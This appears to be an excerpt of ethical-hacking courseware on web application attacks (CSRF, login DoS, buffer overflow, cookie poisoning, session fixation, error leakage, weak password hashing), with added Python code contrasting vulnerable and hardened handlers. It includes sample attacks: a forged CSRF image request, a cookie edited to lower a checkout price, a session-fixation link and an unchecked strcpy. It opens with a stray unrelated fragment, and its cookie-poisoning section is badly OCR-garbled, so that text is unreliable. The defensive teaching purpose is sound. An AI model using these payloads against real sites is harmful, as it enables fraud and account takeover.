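Note that the allow-list accepts protocol-relative links (//ha.ckers.org/.j in the cheat sheet), which is correct for the scheme question but is still an off-site link; whether those are wanted is an application policy, not a scheme-validation matter.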
Cross-Site Request Forgery (CSRF) Attack

Cross-site request forgery (CSRF) attacks exploit web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.

Cross-site request forgery is also known as a one-click attack. CSRF occurs when a user's web browser is instructed to send a request to the vulnerable website through a malicious web page. CSRF vulnerabilities are very commonly found on financial-related websites. Corporate intranets usually can't be accessed by outside attackers, so CSRF is one way to reach into the network: the request is made by the victim's browser, which is already inside. The web application's failure to differentiate a request triggered by malicious code from a genuine request (the browser attaches the session cookie to both) is what exposes it to CSRF.

The attack in the slide's figure proceeds as follows:
1. The user logs into the trusted site and creates a new session.
2. The trusted site stores the session identifier for the session in a cookie in the web browser.
3. The user visits a malicious website.
4. The malicious website sends a request to the trusted site from the user's browser, using his session cookie.

FIGURE: Cross-site Request Forgery (CSRF) Attack
Module 13 Page 1795
Module 13 Page 1796
How CSRF Attacks Work

In a cross-site request forgery attack, the attacker waits for the user to connect to the trusted server and then tricks the user into visiting a malicious page or clicking a malicious link. The page carries code (in the figure, a hidden image tag) that makes the user's browser send a state-changing request to the trusted server; because the browser attaches the user's session cookie, the trusted server executes the request with the user's privileges. The following diagram explains the step-by-step process of a CSRF attack:

1. The user logs into the trusted server using his credentials.
2. The server sets a session cookie in the user's browser.
3. The attacker sends a phishing mail tricking the user into sending a request to a malicious site.
4. The user requests a page from the malicious server.
5. The response page contains the malicious code.
6. The malicious code is executed: the browser fetches the "image", which is really a request to the trusted server, and the order is placed.

Client Side Code (the legitimate purchase form on the trusted site)
<form action="buy.php" method="post">
  <p>Symbol: <input type="text" name="symbol" /></p>
  <p>Shares: <input type="text" name="shares" /></p>
  <p><input type="submit" value="Buy" /></p>
</form>

Server Code
<?php
session_start();
if (isset($_REQUEST['symbol']) && isset($_REQUEST['shares'])) {
    buy_stocks($_REQUEST['symbol'], $_REQUEST['shares']);
}
?>

Malicious Code (on the malicious server's page)
<img src="http://juggyboy.com/juggyshop.php?symbol=MSFT&shares=..." />

Two weaknesses make this work: the server reads $_REQUEST, which merges GET and POST parameters, so the GET issued by the <img> tag satisfies a handler written for a POST form; and nothing in the request proves the user intended it, since the session cookie is attached automatically by the browser.

FIGURE: How CSRF Attacks Work
Module 13 Page 1797
Module 13 Page 1798
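The buy.php logic above in Python, as an added example (not the module's code), next to a hardened version: the vulnerable handler mirrors $_REQUEST and accepts the <img>-triggered GET; the protected one insists on POST, checks Origin/Referer against the trusted site and compares a per-session CSRF token in constant time. The Request class, the PHPSESSID cookie name, the trusted origin https://juggyboy.com, the attacker page http://evil.example/ and the share count 1000 are assumptions made for the example.

```python
"""CSRF: the vulnerable buy handler and a token-protected one, exercised with a forged request.

Added example, not from the CEH module. Request, the session store, buy_stocks() and
all hostnames/values are constructed stand-ins for the PHP application in the figure.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

TRUSTED_ORIGIN = "https://juggyboy.com"     # assumption: the trusted site's origin


@dataclass
class Request:
    method: str
    url: str                                # e.g. "/buy.php?symbol=MSFT&shares=1000"
    cookies: dict
    form: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)

    def params(self) -> dict:
        """Mirror PHP's $_REQUEST: query string and form fields merged, so a GET
        from an <img src=...> reaches a handler written for a POST form."""
        merged = {k: v[0] for k, v in parse_qs(urlsplit(self.url).query).items()}
        merged.update(self.form)
        return merged


SESSIONS = {}    # session id -> {"user": ..., "csrf_token": ...}
ORDERS = []      # what buy_stocks() recorded


def login(user: str) -> str:
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_hex(16)}
    return sid


def buy_stocks(user: str, symbol: str, shares: str) -> None:
    ORDERS.append((user, symbol, int(shares)))


def buy_vulnerable(req: Request) -> str:
    """Equivalent of the module's server code: any request carrying a valid session
    cookie and both parameters places the order."""
    session = SESSIONS.get(req.cookies.get("PHPSESSID"))
    if session is None:
        return "401 not logged in"
    p = req.params()
    if "symbol" in p and "shares" in p:
        buy_stocks(session["user"], p["symbol"], p["shares"])
        return "200 order placed"
    return "400 missing parameters"


def buy_protected(req: Request) -> str:
    """Hardened handler: POST only, same-site Origin/Referer, and a CSRF token
    bound to the session that the attacker's page cannot read."""
    session = SESSIONS.get(req.cookies.get("PHPSESSID"))
    if session is None:
        return "401 not logged in"
    if req.method != "POST":
        return "405 state change must be POST"
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not origin.startswith(TRUSTED_ORIGIN):
        return "403 cross-site origin"
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf_token"]):
        return "403 bad CSRF token"
    p = req.params()
    if "symbol" in p and "shares" in p:
        buy_stocks(session["user"], p["symbol"], p["shares"])
        return "200 order placed"
    return "400 missing parameters"


def forged_img_request(sid: str) -> Request:
    """What the victim's browser sends for <img src="http://juggyboy.com/buy.php?symbol=MSFT&shares=1000">
    on the attacker's page: a GET with the victim's cookie, no form body, attacker page as Referer."""
    return Request("GET", "/buy.php?symbol=MSFT&shares=1000", {"PHPSESSID": sid},
                   headers={"Referer": "http://evil.example/"})


def legitimate_form_request(sid: str) -> Request:
    """The real form submission: POST from the trusted origin with the session's token."""
    return Request("POST", "/buy.php", {"PHPSESSID": sid},
                   form={"symbol": "MSFT", "shares": "10",
                         "csrf_token": SESSIONS[sid]["csrf_token"]},
                   headers={"Origin": TRUSTED_ORIGIN})
```

Each of the three checks in buy_protected closes a different hole: POST-only defeats the <img> vector but not a hidden auto-submitted form, the Origin/Referer check defeats that form unless the headers are stripped, and the token check holds even when both fail, because the malicious page cannot read a value that exists only in the trusted site's response to the user.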
Web Application Denial-of-Service (DoS) Attack

Denial-of-service attacks happen when legitimate users are prevented from performing a desired task or operation. Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers.

Why are applications vulnerable?
- Reasonable use expectations: the application is sized for normal usage patterns
- Application environment bottlenecks
- Implementation flaws
- Poor data validation

Web server resource consumption: the attacker targets CPU, memory, and sockets, disk bandwidth, database bandwidth, and worker processes.

Web services unavailability: application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as legitimate clients, which makes them very hard to detect with existing network-level DoS protection measures, since each individual request is well-formed and only its cost and volume are abnormal.
Module 13 Page 1799
Some of the common ways to perform a web application DoS attack are:
- Bandwidth consumption: flooding a network with data
- Resource starvation: depleting a system's resources
- Programming flaws: exploiting buffer overflows
- Routing and DNS attacks: manipulating DNS tables to point to alternate IP addresses
Module 13 Page 1800
Denial-of-Service (DoS) Examples

Most web applications are designed to serve, or withstand, a limited number of requests. If the limit is exceeded, the web application may fail to serve the additional requests. Attackers take advantage of this to launch denial-of-service attacks on web applications: they send requests until the application's resources are exhausted, at which point it stops responding to other requests even when they come from authorized users, because the attacker has flooded the application with false requests. Various web application DoS attacks include:

User Registration DoS: The attacker could create a program that submits the registration form repeatedly, adding a large number of spurious users to the application.

Login Attacks: The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism, rendering it unavailable or unreasonably slow to respond for genuine users.

User Enumeration: If the application states which part of the user name/password pair is incorrect, an attacker can automate the process of trying common user names from a dictionary file to enumerate the users of the application.

Account Lock-Out Attacks: Dictionary attacks can be minimized by applying an account lock-out method, but that control is itself a DoS vector. The attacker may enumerate user names through another vulnerability in the application and then attempt to authenticate to the site using valid user names and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point, legitimate users will not be able to use the site.
Module 13 Page 1801
Module 13 Page 1802
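The account lock-out problem as an added simulation (not from the module): the same attack is run against a plain per-account lock-out and against a sliding-window throttle keyed by source address, and the outcome for the legitimate user is compared. The user table, thresholds, addresses and timing are constructed assumptions.

```python
"""Login DoS: per-account lock-out hands the attacker a denial of service;
a per-source sliding-window throttle does not.

Added example, not from the CEH module. Credentials, thresholds, addresses and
the event timeline are constructed for the simulation.
"""
from collections import defaultdict, deque

USERS = {"shaun": "correct horse", "jason": "hunter2"}   # constructed credentials


class AccountLockout:
    """The slide's control: N failures on a username lock that account for everyone,
    including its owner, regardless of where the failures came from."""

    def __init__(self, max_failures: int = 5):
        self.max_failures = max_failures
        self.failures = defaultdict(int)          # username -> consecutive failures

    def login(self, user: str, password: str, src_ip: str, now: float) -> str:
        if self.failures[user] >= self.max_failures:
            return "locked"
        if USERS.get(user) == password:
            self.failures[user] = 0
            return "ok"
        self.failures[user] += 1
        return "bad password"


class SourceThrottle:
    """Alternative: limit failures per source address within a sliding window. An
    attacker hammering a username from one address is throttled; the account owner
    logging in from elsewhere is unaffected."""

    def __init__(self, max_failures: int = 5, window: float = 60.0):
        self.max_failures = max_failures
        self.window = window
        self.failures = defaultdict(deque)        # src_ip -> timestamps of failures

    def login(self, user: str, password: str, src_ip: str, now: float) -> str:
        q = self.failures[src_ip]
        while q and now - q[0] > self.window:     # drop failures outside the window
            q.popleft()
        if len(q) >= self.max_failures:
            return "throttled"
        if USERS.get(user) == password:
            return "ok"
        q.append(now)
        return "bad password"


def run_scenario(policy) -> list:
    """Attacker at 203.0.113.9 fires 20 wrong passwords at 'shaun' (a name enumerated
    earlier), one per second; then the real user logs in from 198.51.100.5 with the
    correct password. Returns the list of outcomes, the last one being the victim's."""
    results = [policy.login("shaun", "wrong%d" % i, "203.0.113.9", now=float(i))
               for i in range(20)]
    results.append(policy.login("shaun", "correct horse", "198.51.100.5", now=25.0))
    return results


if __name__ == "__main__":
    print("lockout :", run_scenario(AccountLockout())[-1])
    print("throttle:", run_scenario(SourceThrottle())[-1])
```

A throttle keyed only by source address is in turn defeated by spreading the attempts over many addresses, so production systems usually combine it with per-account soft limits (a delay or a CAPTCHA rather than a hard lock) and alerting on the enumeration pattern.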
Buffer Overflow Attacks

Buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables. Attackers modify function pointers used by the application to direct program execution, through a jump or call instruction, to a location in memory containing malicious code.

Vulnerable Code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char *dest_buffer;

    dest_buffer = (char *) malloc(10);      /* room for 9 characters plus the terminator */
    if (NULL == dest_buffer)
        return -1;
    if (argc > 1) {
        /* No length check: an argument longer than 9 bytes overruns the heap buffer */
        strcpy(dest_buffer, argv[1]);
        printf("The first command-line argument is %s.\n", dest_buffer);
    } else {
        printf("No command-line argument was given.\n");
    }
    free(dest_buffer);
    return 0;
}

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow.

A buffer has a specified data storage capacity, and if the count exceeds the original, the buffer overflows; this means that a buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. Typically, buffers are developed to maintain finite data; additional information can be directed wherever it needs to go. However, extra information may overflow into neighboring buffers, destroying or overwriting legal data.
Module 13 Page 1803
Arbitrary Code

A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables. When a buffer overflows, the execution stack of a web application (or, for a heap buffer like the one in the listing, the heap's bookkeeping data and neighboring allocations) is corrupted. An attacker can then send specially crafted input to the web application so that it executes the arbitrary code, allowing the attacker to take over the machine. Attackers modify function pointers used by the application to redirect the program execution through a jump or call instruction to a location in memory containing malicious code. Buffer overflows are not easy to discover, and even upon discovery they are difficult to exploit. However, the attacker who recognizes a potential buffer overflow can reach a staggering array of products and components.

Buffer Overflow Potential

Both web application and server products, whether they provide static or dynamic features of the site or of the web application, contain the potential for a buffer overflow error. Buffer overflow potential found in server products is commonly known and creates a threat to the users of that product. When web applications use libraries, they inherit any buffer overflow the library contains. Custom web application code may also contain buffer overflow potential. Buffer overflow errors in a custom web application are not easily detected, and fewer attackers find and develop exploits for them: where one is found in a custom application, the attacker's ability to use it for anything beyond crashing the application is reduced by the fact that neither the source code nor the error messages are accessible to the attacker.

The vulnerable code for this section is the main() listed above: malloc(10) followed by an unbounded strcpy() of argv[1].

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow.
Module 13 Page 1804
83 I Cookie/Session Poisoning CEH ( rtifwd I itkitjl Nm Im Cookies are used to m aintain session state in the otherwise stateless HTTP protocol Modify the Cookie Content Inject the Malicious Content Rewriting the Session Data C o o k ie p o is o n in g a t ta c k s in v o lv e t h e m o d if ic a t io n o f t h e c o n t e n t s o f a c o o k ie ( p e r s o n a l in f o r m a t io n s to r e d in a w e b u s e r 's c o m p u t e r ) in o r d e r t o b y p a s s s e c u r it y m e c h a n is m s A P o is o n in g a llo w s a n a t ta c k e r t o in je c t t h e m a lic io u s c o n t e n t, m o d if y t h e u s e r 's o n lin e e x p e r ie n c e, a n d o b t a in t h e u n a u th o r iz e d in f o r m a t io n A p r o x y c a n b e u s e d f o r r e w r it in g t h e s e s s io n d a t a, d is p la y in g t h e c o o k ie d a t a, a n d / o r s p e c ify in g a n e w u s e r ID o r o t h e r s e s s io n id e n t if ie r s in t h e c o o k ie Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. C o o k i e / S e s s i o n P o i s o n i n g Cookies frequently transm it sensitive credentials and can be m odified w ith ease to escalate access or assume the identity of another user. Cookies are used to m aintain a session state in the otherw ise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the w eb application. Poisoning of cookies and session inform ation can allow an attacker to inject malicious content or otherw ise m odify the user's on-line experience and obtain unauthorized inform ation. Cookies can contain session-specific data such as user IDs, passwords, account num bers, links to shopping cart contents, supplied private inform ation, and session IDs. Cookies exist as files stored in the client com puter's m em ory or hard disk. By m odifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. 
Many sites offer a "Remember me?" option and store the user's information in a cookie so that he or she does not have to re-enter the data on every visit. Any private information entered is stored in that cookie. In an attempt to protect cookies, site developers often encode them. Easily reversible encodings such as Base64 and ROT13 (rotating the letters of the alphabet by 13 positions) give many who view cookies a false sense of security: they hide the value from a casual glance but are not encryption, and anyone who captures the cookie can decode and modify it.
Threats

The compromise of cookies and sessions can provide an attacker with user credentials, allowing the attacker to access the account and assume the identity of other users of the application. By assuming another user's online identity, the attacker can review the original user's purchase history, order new items, and exploit whatever services and access the vulnerable web application provides. One of the easiest examples involves using the cookie directly for authentication. Another method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the cookie data and/or specifying a new user ID or other session identifiers in the cookie.

Cookies can be persistent or non-persistent and secure or non-secure, so every cookie is one of four variants. Persistent cookies are stored on disk and non-persistent cookies are stored in memory. Secure cookies (those set with the Secure attribute) are transferred only over SSL connections.
How Cookie Poisoning Works

The slide illustrates the attack with a store checkout:

1. The user browses a web page; the web server replies with the requested page and sets a cookie in the user's browser.
2. The attacker steals the cookie (by sniffing, XSS, or a phishing attack). The user's own checkout request carries it:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host:
    Accept: */*
    Referer:
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=11568;

3. The attacker orders the product using a modified cookie in which the client-supplied total has been lowered:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host:
    Accept: */*
    Referer:
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=100;

4. The product is delivered to the attacker's address.

Cookies are mainly used by web applications to simulate a stateful experience for the end user, and they serve as an identity for the server-side components of the web application. This attack alters the value of a cookie on the client side before the request is sent to the server. A web server sets a cookie by including a Set-Cookie header in any response; the browser stores the cookie on the user's computer and returns it in every subsequent request to that server, which makes cookies a standard way of recognizing users. To provide further functionality, cookies can also be read and modified by JavaScript in the page. In this attack, the attacker sniffs the user's cookie, modifies the cookie parameters, and submits the request to the web server. The server accepts the attacker's request and processes it.
FIGURE: How Cookie Poisoning Works (the checkout sequence described above: web server sets the cookie, attacker steals it by sniffing, XSS or phishing, attacker orders with the modified cookie, product is delivered to the attacker's address)
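The checkout on the slide fails because the server trusts a price that the client computed. The following Python is an added example, not code from the original module or from EC-Council: it models the slide's store twice, once reading TotalPrice from the cookie as the attacked site does and once recomputing it from a server-side catalogue, and shows how an HMAC lets the server detect tampering with any state that must stay in the cookie. The catalogue prices and the secret key are assumptions; the item ids and the 11568 total come from the cookie on the slide.

```python
import hashlib
import hmac

# Constructed catalogue (not from the original page): item id -> price.
# The item ids and the 11568 total match the cookie on the slide; the unit prices are assumed.
CATALOG = {"1258": 4500, "2658": 3200, "6652": 3868}

# The cookie the slide shows the victim sending, and the attacker's modified copy.
ORIGINAL_COOKIE = ("SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; "
                   "Item2=2658; Item3=6652; TotalPrice=11568")
TAMPERED_COOKIE = ORIGINAL_COOKIE.replace("TotalPrice=11568", "TotalPrice=100")


def parse_cookie(header):
    """Split a Cookie request header into a dict; a repeated name keeps the last value."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def vulnerable_checkout(cookie_header):
    """The store on the slide: the price to charge is read straight from the client's cookie."""
    return int(parse_cookie(cookie_header)["TotalPrice"])


def hardened_checkout(cookie_header):
    """Only the item ids are taken from the cookie; the total is recomputed from the server's catalogue."""
    cookies = parse_cookie(cookie_header)
    basket_size = int(cookies.get("BasketSize", "0"))
    item_ids = [cookies[f"Item{i}"] for i in range(1, basket_size + 1)]
    return sum(CATALOG[item_id] for item_id in item_ids)   # KeyError for an unknown item: fail closed


def sign_cookie_value(value, key):
    """For state that must live in the cookie: append an HMAC so any change is detectable."""
    mac = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def verify_cookie_value(signed, key):
    """Return the original value if the HMAC matches, else None. compare_digest avoids timing leaks."""
    value, sep, mac = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None


if __name__ == "__main__":
    print("vulnerable store charges:", vulnerable_checkout(TAMPERED_COOKIE))
    print("hardened store charges:  ", hardened_checkout(TAMPERED_COOKIE))
```

The hardened version still reads the item ids from the cookie, which is acceptable only because the server recomputes everything that has a security consequence; the signature is for the remaining cases where the value itself (a role, a basket) has to round-trip through the client. A signature does not stop replay of an old but validly signed cookie, so values that must not be replayed belong in the server-side session instead.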
Session Fixation Attack

In a session fixation attack, the attacker tricks the user into accessing a genuine web server using an explicit session ID value. The attacker then assumes the identity of the victim and exploits the victim's credentials at the server.

Session fixation helps an attacker hijack a valid user session. The attacker first obtains a known session ID (for example by logging in to the server, which sets a session ID on the attacker's machine) and then lures the victim into using that same session ID. If the victim authenticates with the session ID supplied by the attacker, the attacker hijacks the now-validated session, because the session ID is already known. The attack proceeds as follows:

1. The attacker logs on to the bank website (juggybank.com) using his own credentials; the web server sets a session ID on the attacker's machine.
2. The attacker sends the victim an email containing a link with the fixed session ID, for example http://juggybank.com/login.jsp?sessionid=4321
3. The user clicks the link and is redirected to the bank website.
4. The user logs in to the server using his credentials and the fixed session ID.
5. The attacker now presents the same session ID, and the server treats him as the logged-in victim.

FIGURE 13.26: Session Fixation Attack
Insufficient Transport Layer Protection

Insufficient transport layer protection means the site supports weak algorithms or uses expired or invalid certificates. A poorly configured SSL setup also helps the attacker launch phishing and man-in-the-middle (MITM) attacks. This vulnerability exposes users' data to untrusted third parties and can lead to account theft.

SSL/TLS should protect every authenticated part of a website; otherwise an attacker who can monitor network traffic can steal an authenticated user's session cookie. Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. The communication between the website and the client should be properly encrypted, or data can be intercepted, injected, or redirected. Account theft, phishing attacks, and compromise of administrator accounts can follow once systems are compromised.
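Two of the weaknesses in this section and in the "Remember me?" discussion above can be checked from the Set-Cookie headers a site returns: a session cookie without the Secure attribute travels over plain HTTP and can be sniffed, and a cookie whose value is merely Base64- or ROT13-encoded can be read by anyone who captures it. The following Python audit is an added example, not code from the original module or from EC-Council. The headers it inspects are constructed; the SESSIONID value is the one on the slide, and the keyword lists used to recognize session cookies and decoded application data are assumptions.

```python
import base64
import codecs
import re

# Cookie names that usually carry session/authentication state (assumed list).
SESSION_NAME = re.compile(r"(sess|sid|auth|token|login)", re.I)
# Plaintext patterns that mark a decoded value as application data rather than noise (assumed list).
LOOKS_LIKE_DATA = re.compile(r"\b(user|uid|id|pass|pwd|role|admin|cart)\s*=", re.I)

# Constructed headers for the demonstration.
PLAIN_HEADER = "SESSIONID=325896ASDD23SA3587; Path=/"
HARDENED_HEADER = "SESSIONID=325896ASDD23SA3587; Path=/; Secure; HttpOnly; SameSite=Lax"
BASE64_HEADER = ("profile=dXNlcj1hZG1pbjtyb2xlPWFkbWlu; Path=/; "
                 "Expires=Wed, 01 Jan 2031 00:00:00 GMT")   # value is base64 of user=admin;role=admin
ROT13_HEADER = "prefs=hfre=nqzva; Path=/"                  # value is rot13 of user=admin


def parse_set_cookie(header):
    """Return (name, value, attributes) for one Set-Cookie header; attribute names are lower-cased."""
    first, *rest = [p.strip() for p in header.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for item in rest:
        key, _, val = item.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def decode_if_reversible(value):
    """Return the plaintext if the value is merely Base64- or ROT13-obscured application data, else None."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
        if text.isprintable() and LOOKS_LIKE_DATA.search(text):
            return text
    except (ValueError, UnicodeDecodeError):
        pass
    rotated = codecs.decode(value, "rot_13")
    if LOOKS_LIKE_DATA.search(rotated):
        return rotated
    return None


def audit_set_cookie(header):
    """List the weaknesses in one Set-Cookie header that let the cookie be sniffed, scripted, replayed or read."""
    name, value, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP, so a network sniffer can capture it")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable by script injected through XSS")
    if "samesite" not in attrs:
        findings.append("missing SameSite: attached to cross-site requests (CSRF)")
    if SESSION_NAME.search(name) and ("expires" in attrs or "max-age" in attrs):
        findings.append("persistent session cookie: stays on disk after the browser closes")
    decoded = decode_if_reversible(value)
    if decoded is not None:
        findings.append(f"reversible encoding, not encryption: value decodes to {decoded!r}")
    return findings


if __name__ == "__main__":
    for header in (PLAIN_HEADER, HARDENED_HEADER, BASE64_HEADER, ROT13_HEADER):
        print(header)
        for finding in audit_set_cookie(header) or ["no findings"]:
            print("   ", finding)
```

Run it against the Set-Cookie headers captured from a login response. The decoding heuristics are deliberately narrow; a value that decodes to bytes without a recognizable key=value structure is reported as nothing, so a false negative is possible while a false positive is not.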
Improper Error Handling

Improper error handling gives insight into the source code, revealing logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities. The slide shows a typical verbose error page (from a forum at http://juggyboy.com/):

    General Error
    Could not obtain post/user information
    DEBUG MODE
    SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
    SELECT u.username, u.user_id, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_allowsmile, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid FROM nuke_bbposts p, nuke_users u, nuke_bbposts_text pt WHERE p.topic_id = 1547 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time ASC LIMIT 0, 15
    Line: 435
    File: /usr/home/geeks/www/vonage/modules/forums/viewtopic.php

A single response reveals that debug mode is enabled, the table and column names, the complete SQL query, an absolute file path on the server, and the source line that failed.

Improper error handling may result in various security issues for a website, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. From them an attacker can learn details such as the software in use and its version. Improper error handling may allow an attacker to gather information such as:

- Out of memory
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
- Application environment
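The tester's side of this is recognizing leaky responses in bulk, and the developer's side is making sure an exception never reaches the client in raw form. The following Python is an added example, not code from the original module or from EC-Council: a set of regular-expression signatures run over response bodies, tested against a reconstruction of the slide's error page, beside a handler that sends the client only a reference id and writes the detail to the server log. The signature list is an assumption and is meant to be extended for the stacks you test.

```python
import logging
import re
import uuid

# Signatures of information-leaking error output (assumed list; extend for the stacks you test).
LEAK_SIGNATURES = {
    "sql_error": re.compile(r"(SQL ?Error|error in your SQL syntax|ORA-\d{5}|SQLSTATE\[)", re.I),
    "sql_query": re.compile(r"\bSELECT\b.+?\bFROM\b", re.I | re.S),
    "file_path": re.compile(r"(/(?:usr|home|var|opt|srv)/[\w./-]+\.(?:php|jsp|aspx?|py|rb)|[A-Za-z]:\\[\w\\.-]+)"),
    "stack_trace": re.compile(r"(Traceback \(most recent call last\)|\bat [\w.$<>]+\([\w.]+:\d+\)|NullPointerException|NullReferenceException)"),
    "debug_mode": re.compile(r"DEBUG ?MODE", re.I),
    "source_line": re.compile(r"\bLine:\s*\d+", re.I),
}

# Constructed from the error page on the slide (a phpBB-style forum running with DEBUG MODE on).
SAMPLE_ERROR_PAGE = """General Error
Could not obtain post/user information
DEBUG MODE
SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
SELECT u.username, u.user_id, u.user_posts, p.*, pt.post_text FROM nuke_bbposts p, nuke_users u, nuke_bbposts_text pt WHERE p.topic_id = 1547 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time ASC LIMIT 0, 15
Line: 435
File: /usr/home/geeks/www/vonage/modules/forums/viewtopic.php
"""


def find_leaks(body):
    """Return the sorted names of every leak signature that matches a response body."""
    return sorted(name for name, pattern in LEAK_SIGNATURES.items() if pattern.search(body))


def safe_error_response(exc, log=logging.getLogger("webapp")):
    """Build the (status, body) a hardened handler returns: detail to the log, only a reference id to the client."""
    reference = uuid.uuid4().hex[:12]
    log.error("ref=%s %s: %s", reference, type(exc).__name__, exc, exc_info=exc)
    return 500, f"An internal error occurred. Reference: {reference}"


if __name__ == "__main__":
    print("leaks in the slide's error page:", find_leaks(SAMPLE_ERROR_PAGE))
    status, body = safe_error_response(RuntimeError("Can't open file: 'nuke_bbposts_text.MYD'"))
    print(status, body, "leaks:", find_leaks(body))
```

In a scan, feed find_leaks() every response with a 5xx status and every response to a deliberately malformed parameter; a non-empty result is a finding. The reference id in safe_error_response() is what lets support staff correlate a user's complaint with the logged stack trace without that trace ever leaving the server.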
Insecure Cryptographic Storage

Web applications use cryptographic algorithms to protect their data and other sensitive information, both while it is transferred between server and client and while it is stored. Insecure cryptographic storage is the state of an application that uses poorly written encryption code, weak algorithms, or no protection at all when storing sensitive data in the database. Such data can be read and modified by an attacker who obtains the database, yielding confidential and sensitive information such as credit card numbers, passwords, SSNs, and other authentication credentials that were never protected with appropriate encryption or hashing, and enabling identity theft, credit card fraud, or other crimes. Developers can avoid such attacks by using proper algorithms to protect sensitive data. The figure contrasts vulnerable code that stores data with weak encryption against secure code that uses a secure cryptographic algorithm.

FIGURE: Insecure Cryptographic Storage
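The most common instance of this flaw is the password table, so the following Python is an added example, not code from the original module or from EC-Council, showing the weak pattern beside the correct one: an unsalted MD5 digest, which is identical for every user with the same password and cheap to brute-force from a leaked table, against a per-user random salt with PBKDF2-HMAC-SHA256 from the standard library and a constant-time comparison. The iteration count and the storage format are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000   # assumed work factor; raise it as hardware gets faster


def store_password_weak(password):
    """The insecure pattern: one fast, unsalted hash. Equal passwords give equal hashes, and rainbow tables apply."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def store_password(password, iterations=ITERATIONS):
    """Salted, iterated hash. The returned string is self-describing so the parameters can change later."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and parameters; compare_digest keeps the comparison constant-time."""
    algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def needs_rehash(stored, iterations=ITERATIONS):
    """True when a stored hash uses a weaker work factor than current policy; rehash at next successful login."""
    algorithm, stored_iterations, _, _ = stored.split("$")
    return algorithm != "pbkdf2_sha256" or int(stored_iterations) < iterations


if __name__ == "__main__":
    print("weak, same for every user:", store_password_weak("secret"))
    record = store_password("secret")
    print("salted record:", record)
    print("verify correct:", verify_password("secret", record), "wrong:", verify_password("Secret", record))
```

Two users with the same password get different records, so a leaked table reveals nothing about shared passwords, and every guess costs the attacker the full iteration count. The same approach applies to any credential-like secret the application must verify but never needs to read back; data it does need to read back (card numbers) needs authenticated encryption with a key kept outside the database, which this example does not cover.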
Broken Authentication and Session Management

An attacker uses vulnerabilities in the authentication or session management functions, such as exposed accounts, session IDs, logout, password management, timeouts, "remember me", secret question, account update, and others, to impersonate users.

Authentication and session management include every aspect of user authentication and managing active sessions. Even otherwise solid authentication fails when the surrounding credential functions are weak: password change, "forgot my password", "remember my password", account update, etc. Utmost care has to be taken with user authentication. It is always better to use strong authentication methods, through special software- and hardware-based cryptographic tokens or biometrics.

Session ID in URLs

